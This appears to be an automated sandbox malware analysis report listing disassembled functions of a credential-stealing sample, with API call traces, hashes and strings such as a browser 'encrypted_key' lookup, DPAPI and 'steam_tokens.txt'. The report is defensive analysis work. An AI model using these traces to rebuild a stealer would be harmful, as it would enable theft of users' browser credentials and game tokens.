                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 002D2895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D289C
                                    • Part of subcall function 002D2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 002D2925
                                    • Part of subcall function 002D2910: RtlAllocateHeap.NTDLL(00000000), ref: 002D292C
                                    • Part of subcall function 002D2910: RegOpenKeyExA.ADVAPI32(80000002,011BC048,00000000,00020119,002D28A9), ref: 002D294B
                                    • Part of subcall function 002D2910: RegQueryValueExA.ADVAPI32(002D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002D2965
                                    • Part of subcall function 002D2910: RegCloseKey.ADVAPI32(002D28A9), ref: 002D296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,011BC048,00000000,00020119,002C9500), ref: 002D28D1
                                  • RegQueryValueExA.ADVAPI32(002C9500,011CE070,00000000,00000000,00000000,000000FF), ref: 002D28EC
                                  • RegCloseKey.ADVAPI32(002C9500), ref: 002D28F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: b9c91da0670a8e6a88b61541a55453d2c3a2b512248f9e9bb9c9159e7c938759
                                  • Instruction ID: cb50d89b517c853df122e287b6d845c7d02c2959fe1113b31968aafc21545c27
                                  • Opcode Fuzzy Hash: b9c91da0670a8e6a88b61541a55453d2c3a2b512248f9e9bb9c9159e7c938759
                                  • Instruction Fuzzy Hash: BF01A271A50258BFDB20DBA4EC89FAA777CEB44315F1001A9FE08DA392DA705D5487A4
                                  Function 002B71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 002B723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 002B7279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002B72C3
                                  • HeapFree.KERNEL32(00000000), ref: 002B72CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 002B7329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: 80b2fa7a7d2f0d81c6844a39940e65c7f3e0ef74f45b03522d0e55f869612060
                                  • Instruction ID: 4111702e421522198393cf87c86b4664d6c9eb7b478ab826edbf93c65058edbd
                                  • Opcode Fuzzy Hash: 80b2fa7a7d2f0d81c6844a39940e65c7f3e0ef74f45b03522d0e55f869612060
                                  • Instruction Fuzzy Hash: 82418C71B156069BEB20CF69DC84BEAB3E8FB88345F1445A9EC4DCB341E631ED209B50
                                  Function 002B9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 002B9CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002B9CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002B9D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: 20ceee606b337dc0874ae50474ba2af1aba86ac94d0ccaa71163eb7b1385448d
                                  • Instruction ID: 3c71fe2b611cfb2452f8c0e67750c47047ff78f1c0189b6b92477f314d4dfd85
                                  • Opcode Fuzzy Hash: 20ceee606b337dc0874ae50474ba2af1aba86ac94d0ccaa71163eb7b1385448d
                                  • Instruction Fuzzy Hash: B741F231A2020B9BDF21FF65DC816EEB7B4EF45784F144065EA55AB252DA30ED64CB80
                                  Function 002CE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CEA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CEA61
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CEA7A
                                  • lstrcat.KERNEL32(?,011C92A8), ref: 002CEA8D
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CEA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 9ade6e26855480d3bca93d4e56d25a5b1f0670135f619d2f8ec2831fa1873704
                                  • Instruction ID: 7959179e09e633e394de91ed28a63e83f43dbcb69cb54a9661beee2e453b8dbe
                                  • Opcode Fuzzy Hash: 9ade6e26855480d3bca93d4e56d25a5b1f0670135f619d2f8ec2831fa1873704
                                  • Instruction Fuzzy Hash: CD41A771920259EFCB55EF64DC82FED7378BF88300F514468BA1AAB281DE709E588F54
                                  Function 002CECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CECDF
                                  • lstrlen.KERNEL32(00000000), ref: 002CECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CED1D
                                  • lstrlen.KERNEL32(00000000), ref: 002CED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 002CED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: 8e7cb01f7c77cc013313806eec36628f0600050b091a193df62acc875c39bff6
                                  • Instruction ID: 9a024f488d8e5efd1ee49a2079f21b5358eb32cffdca38299e303852ff8c39b8
                                  • Opcode Fuzzy Hash: 8e7cb01f7c77cc013313806eec36628f0600050b091a193df62acc875c39bff6
                                  • Instruction Fuzzy Hash: ED319531A306569BCB21BF78EC4AA9E7768AF00340F254175F886DB252DB30DD298BD1
                                  Function 002B9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,002B140E), ref: 002B9A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,002B140E), ref: 002B9AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,002B140E), ref: 002B9AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,002B140E,00000000,?,?,?,002B140E), ref: 002B9AE0
                                  • LocalFree.KERNEL32(?,?,?,?,002B140E), ref: 002B9B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,002B140E), ref: 002B9B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 651b00091ba678b0dfade5c8b68bda7d2e0f3c7f46cd822f2099d4e059365c3a
                                  • Instruction ID: ffeb1033750fb771e7aca953f6a0cb4105b1e951c16ecbe0ceb257c18d2de7ab
                                  • Opcode Fuzzy Hash: 651b00091ba678b0dfade5c8b68bda7d2e0f3c7f46cd822f2099d4e059365c3a
                                  • Instruction Fuzzy Hash: B611217161020AAFEB10DF69DCC4AFA776CFB04784F104169FA15EA181DB709D50CB64
                                  Function 002D5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5B14
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 002D5B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 002D5B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 002D5B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: ec8ec891fc2366e820c9ca6025cdcf6339a2974f75abaeba5f55dbb0f2061566
                                  • Instruction ID: f297a9a4804aad14fdcc6b114905e5fb264128ca0a252c2647a7d60fbf7ede86
                                  • Opcode Fuzzy Hash: ec8ec891fc2366e820c9ca6025cdcf6339a2974f75abaeba5f55dbb0f2061566
                                  • Instruction Fuzzy Hash: 02418172B105199FCF08DF6CC995AAEBBF5EB88314F14822AE909E7344E670DD10CB90
                                  Function 002C7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7D58
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1D5
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: 5deeeffd4bfeae1901dc1047d750588b9c9a9bf483181078a3661e3640a6551c
                                  • Instruction ID: a5a3fca0084105fa7930a4b4e518093754b7ffbad814e5b64b4bd1ad80c8a044
                                  • Opcode Fuzzy Hash: 5deeeffd4bfeae1901dc1047d750588b9c9a9bf483181078a3661e3640a6551c
                                  • Instruction Fuzzy Hash: 6421A2323243018BD7249E6CD881F3AB7E9BF91760F204B6EE4568B381D771DC608BA5
                                  Function 002D33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002D33EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D33F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 002D3411
                                  • wsprintfA.USER32 ref: 002D3437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: dd5b4bb2bb2d837115da405f0ae2a8a3cb2f3e14af5d3486f33720891ef9a0e8
                                  • Instruction ID: 3e4e14e953b01a5cc7667182c70876ffe70249d7e42fc41329d40854b06f6edf
                                  • Opcode Fuzzy Hash: dd5b4bb2bb2d837115da405f0ae2a8a3cb2f3e14af5d3486f33720891ef9a0e8
                                  • Instruction Fuzzy Hash: 53012871A10254AFDB14DF98CC45BAEB7B8FB45710F40423AF906E7380D7B45D0086A5
                                  Function 002CD7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,011CDAF0,00000000,00020119,?), ref: 002CD7F5
                                  • RegQueryValueExA.ADVAPI32(?,011CE298,00000000,00000000,00000000,000000FF), ref: 002CD819
                                  • RegCloseKey.ADVAPI32(?), ref: 002CD823
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CD848
                                  • lstrcat.KERNEL32(?,011CE4F0), ref: 002CD85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
